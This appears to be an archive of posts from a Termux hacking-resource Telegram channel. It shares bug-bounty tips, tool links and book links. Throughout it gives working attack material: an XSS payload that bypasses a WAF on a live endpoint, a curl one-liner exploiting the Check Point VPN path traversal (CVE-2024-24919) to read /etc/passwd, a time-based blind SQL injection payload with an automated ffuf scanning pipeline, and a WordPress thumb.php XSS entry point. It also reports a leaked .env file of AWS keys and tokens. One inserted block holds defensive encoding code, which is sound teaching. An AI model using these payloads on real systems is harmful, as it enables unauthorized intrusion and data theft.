Termux All Command [Telegram Group]
Hello, this is the Termux All Command official Telegram group. All kinds of resources are shared here. It is also a backup of the Facebook page.
Telegram Channel >> https://t.me/termuxcommandfull
Facebook Page >> https://www.facebook.com/termux.command.full
Posts archive
[+] Sensitive Secrets Exposed!
I recently discovered a sensitive file /.env containing:
SECRET_KEY
AWS_ACCESS_KEY_ID
AWS_SECRET_ACCESS_KEY
AWS_STORAGE_BUCKET_NAME
auth_token
account_sid
Automate DNS Enumerations With DNS G. : https://github.com/sakibulalikhan/dnsg
Excited to share my latest video with you all! 🎥 Dive into the most cutting-edge methods to hunt down XSS vulnerabilities in 2024 and learn how to outsmart common web application firewall misconfigurations. 🛡✨
Unlock the secrets to becoming a web security ninja! 🔐
👉 Check it out now: https://lnkd.in/dZSq_6ks
Hello security researchers and bounty hunters! 👋
Today, I discovered a reflected XSS vulnerability on a bug bounty site protected by a Web Application Firewall (WAF).
Endpoint : https://lnkd.in/dnQ8h5Rr
Here's a quick rundown of my findings:
The parameter value was reflected in the source code within a <script> tag as parameter="myvalue";.
Initial payload attempts like "-alert()-", "-confirm()-", and "-prompt()-" were blocked by the WAF.
After further testing, I found that the WAF only blocked those specific keywords (alert(), confirm(), prompt() ). I successfully bypassed the WAF using the payload "-(alert)(1337)-".
Endpoint : https://lnkd.in/dnQ8h5Rr"-(alert)(1337)-"
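An added example, not part of the original post: the reflection described above (a value placed inside a <script> string literal) rendered with and without output encoding, to show that the fix belongs at the sink and not in a keyword filter. The blocklist, function names and template are constructed stand-ins, not the site's or the WAF's actual code.

```javascript
// Constructed stand-in for the WAF rule the post describes: literal keyword match.
const BLOCKED_KEYWORDS = ["alert(", "confirm(", "prompt("];

function wafAllows(value) {
  const lowered = value.toLowerCase();
  return !BLOCKED_KEYWORDS.some((kw) => lowered.includes(kw));
}

// Reflection as described in the post: the raw value lands inside a JS string.
function renderUnsafe(value) {
  return `var parameter="${value}";`;
}

// Fix at the sink: encode every non-alphanumeric UTF-16 unit as \uXXXX so the
// value cannot close the string literal or the surrounding <script> element.
function encodeForJsString(value) {
  return String(value).replace(/[^A-Za-z0-9 ]/g, (ch) =>
    "\\u" + ch.charCodeAt(0).toString(16).padStart(4, "0"));
}

function renderSafe(value) {
  return `var parameter="${encodeForJsString(value)}";`;
}

// True when the statement holds anything other than one intact string literal.
function escapesStringLiteral(scriptBody) {
  const withoutEscapes = scriptBody.replace(/\\./g, "");
  return (withoutEscapes.match(/"/g) || []).length !== 2;
}

// Evaluate only the encoded form, to confirm the value round-trips as plain data.
function readBack(scriptBody) {
  return new Function(`${scriptBody} return parameter;`)();
}

const reported = '"-(alert)(1337)-"'; // the value quoted in the post
console.log("filter allows it:", wafAllows(reported));
console.log("unsafe render breaks the literal:", escapesStringLiteral(renderUnsafe(reported)));
console.log("encoded render breaks the literal:", escapesStringLiteral(renderSafe(reported)));
console.log("encoded value round-trips:", readBack(renderSafe(reported)) === reported);
```

With the encoder in place the filter's verdict no longer matters, because the value is only ever parsed as string data.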
Hacker Books:
Penetration Testing: A Hands-On Introduction to Hacking: https://amzn.to/31GN7iX
The Hacker Playbook 3: https://amzn.to/34XkIY2
Hacking: The Art of Exploitation: https://amzn.to/2VchDyL
The Web Application Hacker's Handbook: https://amzn.to/30Fj21S
Real-World Bug Hunting: A Field Guide to Web Hacking: https://amzn.to/2V9srOe
Social Engineering: The Science of Human Hacking: https://amzn.to/31HAmVx
Linux Basics for Hackers: https://amzn.to/34WvcXP
Python Crash Course, 2nd Edition: https://amzn.to/30gINu0
Violent Python: https://amzn.to/2QoGoJn
Black Hat Python: https://amzn.to/2V9GpQk
Auxiliary script meant for Red Team exercises to check if a URL redirects to a masked 404 (such as a 200 that redirects to a "Not found" page or similar). URLs must be passed sorted in order to improve performance. : https://github.com/carlospolop/404checker
As an OSINT investigator 🔍 I often need to expand Instagram profile photos for effective analysis.
Did you know that the Forensic OSINT Chrome extension has a data insights button that lets you quickly view profile photos in a larger format?
This feature, along with other helpful research tips 🛠, streamlines your investigation process.
Hello Guys
I got an awesome tool 🔥💯 for OSINT and information gathering, to track IPs, mobile numbers and usernames ✌️
https://lnkd.in/dyBFdX92
I guess you've already read about the recent Check Point VPN path-traversal zero-day. In my opinion, this is more worrying than some news/advisories are saying, because:
- It's extremely easy to exploit (remote & unauthenticated), and we know that VPN servers are Internet exposed.
- The PoC is already public, widespread, and really easy to find.
- If you're not familiar with path-traversal vulnerabilities, it allows an attacker to read any file on the server. For example, the shadow file containing user accounts' hashed passwords.
- Shodan shows more than 20k Check Point VPN servers exposed to the Internet.
Here's a quick one-liner I just made that you can use to confirm if your server is vulnerable:
curl -k -s https://HOST/clients/MyCRL -X POST -d "aCSHELL/../../../../../../../etc/passwd" | grep -q 'root:' && echo "Vulnerable" || echo "Not Vulnerable"
Check Point security advisory - CVE-2024-24919: https://lnkd.in/ekZKGubZ
Patch and rotate your passwords ASAP!
Bug: Blind SQLi
Payload: (SELECT(0)FROM(SELECT(SLEEP(10)))a)
Command: waymore -i "target.com" -n -mode U | qsreplace "FUZZ" | gf sqli | sort -u | while read urls; do ffuf -u "$urls" -w /usr/share/wordlists/my-payloads/SQLi/Blind-SQLis/blind-sqli.txt -mt ">18000" -v -mc 200 -enc FUZZ:urlencode -timeout 150 -o SQLi_blind_ffuf.json; done
Bug: Cross Site Scripting
Tip: entrypoint=1/wp-content/themes/ambience/thumb.php?src= ✘
entrypoint=1/wp-content/themes/ambience/thumb.php?src=.png ✔️
